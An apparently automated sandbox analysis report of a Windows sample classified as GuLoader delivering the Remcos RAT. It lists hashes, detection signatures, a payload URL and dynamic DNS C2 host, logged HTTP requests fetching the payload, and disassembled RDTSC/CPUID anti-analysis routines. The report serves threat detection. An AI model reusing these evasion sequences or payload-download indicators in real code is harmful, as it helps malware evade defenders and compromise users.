Windows Analysis Report kGSHiWbgq9.exe

Overview

General Information

Sample Name: kGSHiWbgq9.exe
Analysis ID: 457930
MD5: 27bf14807bc9d5cd2d823293f43c3a3a
SHA1: 08eeed11867aa351be0d6c48da283721ee6c0769
SHA256: 55fd5769df0df23d4140a34d07dc2c833b43ac1060f4d0992bdd27316041c69a
Tags: exe

Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}
Multi AV Scanner detection for submitted file
Source: kGSHiWbgq9.exe Virustotal: Detection: 21%
Yara detected Remcos RAT
Source: Yara match File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR
Machine Learning detection for sample
Source: kGSHiWbgq9.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: kGSHiWbgq9.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_PRUu
Uses dynamic DNS services
Source: unknown DNS query: name: wealthyrem.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49759 -> 194.5.97.128:39200
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE DANILENKODE
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: global traffic HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: wealthyrem.ddns.net
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\kGSHiWbgq9.exe

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F90E6 NtProtectVirtualMemory, 1_2_020F90E6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2873 NtWriteVirtualMemory,LoadLibraryA, 1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5968 NtAllocateVirtualMemory, 1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F443A NtWriteVirtualMemory, 1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5A62 NtWriteVirtualMemory,NtAllocateVirtualMemory, 1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F7A7A NtWriteVirtualMemory, 1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F4B7C NtWriteVirtualMemory, 1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F4BC9 NtWriteVirtualMemory, 1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F8FBB NtProtectVirtualMemory, 1_2_020F8FBB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F4DB6 NtWriteVirtualMemory, 1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 11_2_00569C03 LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 11_2_00569C03
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 11_2_00569B39 LdrInitializeThunk,NtProtectVirtualMemory, 11_2_00569B39
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 11_2_00569C2B LdrInitializeThunk,NtProtectVirtualMemory, 11_2_00569C2B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 11_2_00569B22 LdrInitializeThunk,NtProtectVirtualMemory, 11_2_00569B22
Detected potential crypto function
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5781 1_2_020F5781
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F94D8 1_2_020F94D8
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F853B 1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F05A1 1_2_020F05A1
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0BDC 1_2_020F0BDC
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2873 1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5968 1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0211 1_2_020F0211
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F4339 1_2_020F4339
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F40B7 1_2_020F40B7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0691 1_2_020F0691
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F86DB 1_2_020F86DB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F86F4 1_2_020F86F4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F443A 1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F95C6 1_2_020F95C6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F85E7 1_2_020F85E7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5A62 1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F7A7A 1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2A77 1_2_020F2A77
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F3ACE 1_2_020F3ACE
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0B59 1_2_020F0B59
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F4B7C 1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F4BC9 1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F3BFF 1_2_020F3BFF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F8802 1_2_020F8802
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F3874 1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F891F 1_2_020F891F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0921 1_2_020F0921
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F398F 1_2_020F398F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F7E5C 1_2_020F7E5C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F1E99 1_2_020F1E99
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0ED2 1_2_020F0ED2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2FD3 1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F8C2C 1_2_020F8C2C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F3CEF 1_2_020F3CEF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0CFA 1_2_020F0CFA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F3CF2 1_2_020F3CF2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2D3B 1_2_020F2D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5D78 1_2_020F5D78
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F1DA0 1_2_020F1DA0
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F4DB6 1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F0DD5 1_2_020F0DD5
PE file contains strange resources
Source: kGSHiWbgq9.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: kGSHiWbgq9.exe, 00000001.00000000.646609422.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 00000001.00000002.773544375.0000000002090000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000000.772049826.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726897873.0000000000860000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Uses 32bit PE files
Source: kGSHiWbgq9.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe File created: C:\Users\user\AppData\Roaming\remcos
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe File created: C:\Users\user\AppData\Local\Temp\~DFA49EFCEC46BBB65C.TMP
Source: kGSHiWbgq9.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: kGSHiWbgq9.exe Virustotal: Detection: 21%
Source: unknown Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00408873 push esp; ret 1_2_00408877
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_004088C0 push esp; ret 1_2_004088CB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_004014E9 push es; ret 1_2_004014EA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00408CB2 push esi; ret 1_2_00408CB3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_0040891C push esi; retf 1_2_0040892F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00407D36 pushad ; iretd 1_2_00407D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00408672 push esi; ret 1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00407E22 push ds; iretd 1_2_00407E27
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00408624 push esp; ret 1_2_00408627
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00408ADE push esi; retf 1_2_00408ADF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_00408695 push esi; ret 1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F6625 push ebp; iretd 1_2_020F6637
Source: initial sample Static PE information: section name: .text entropy: 7.07266809617
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2FD3 1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2D3B 1_2_020F2D3B
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F7CB5 second address: 00000000020F7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B0E65173h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B0E65169h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B0E6506Ch 0x00000063 call 00007FB8B0E650C7h 0x00000068 call 00007FB8B0E65194h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F7DF9 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0366842h 0x0000002e popad 0x0000002f call 00007FB8B03663C1h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 0000000000567CB5 second address: 0000000000567CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B03662D3h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B03662C9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B03661CCh 0x00000063 call 00007FB8B0366227h 0x00000068 call 00007FB8B03662F4h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 0000000000567DF9 second address: 0000000000567DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0E656E2h 0x0000002e popad 0x0000002f call 00007FB8B0E65261h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 000000000056326F second address: 00000000005632FA instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [edi+00000814h], esi 0x00000009 mov esi, dword ptr [ebp+00000277h] 0x0000000f je 00007FB8B03663A8h 0x00000015 mov dword ptr [ebp+000001C9h], eax 0x0000001b mov eax, ecx 0x0000001d push eax 0x0000001e mov eax, dword ptr [ebp+000001C9h] 0x00000024 mov esi, dword ptr [edi+00000814h] 0x0000002a mov eax, dword ptr [edi+00000800h] 0x00000030 add eax, esi 0x00000032 add eax, ecx 0x00000034 test dh, dh 0x00000036 mov dword ptr [ebp+000001A6h], eax 0x0000003c mov eax, EC4E9022h 0x00000041 xor eax, 74E0F7A3h 0x00000046 xor eax, 4B60BED9h 0x0000004b sub eax, D3CED944h 0x00000050 cmp bh, 00000033h 0x00000053 push eax 0x00000054 mov eax, dword ptr [ebp+000001A6h] 0x0000005a mov dword ptr [ebp+0000018Fh], edx 0x00000060 mov edx, eax 0x00000062 push edx 0x00000063 mov edx, dword ptr [ebp+0000018Fh] 0x00000069 cmp ah, ch 0x0000006b mov ebx, edi 0x0000006d add ebx, 00000C00h 0x00000073 mov dword ptr [ebp+00000273h], ecx 0x00000079 mov ecx, ebx 0x0000007b cmp dl, al 0x0000007d push ecx 0x0000007e mov ecx, dword ptr [ebp+00000273h] 0x00000084 cmp dh, FFFFFFD7h 0x00000087 pushad 0x00000088 lfence 0x0000008b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5781 rdtsc 1_2_020F5781
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Window / User API: threadDelayed 9165
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Window / User API: foregroundWindowGot 557
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080 Thread sleep count: 9165 > 30
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080 Thread sleep time: -45825s >= -30000s
Sleep loop found (likely to delay execution)
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Thread sleep count: Count: 9165 delay: -5
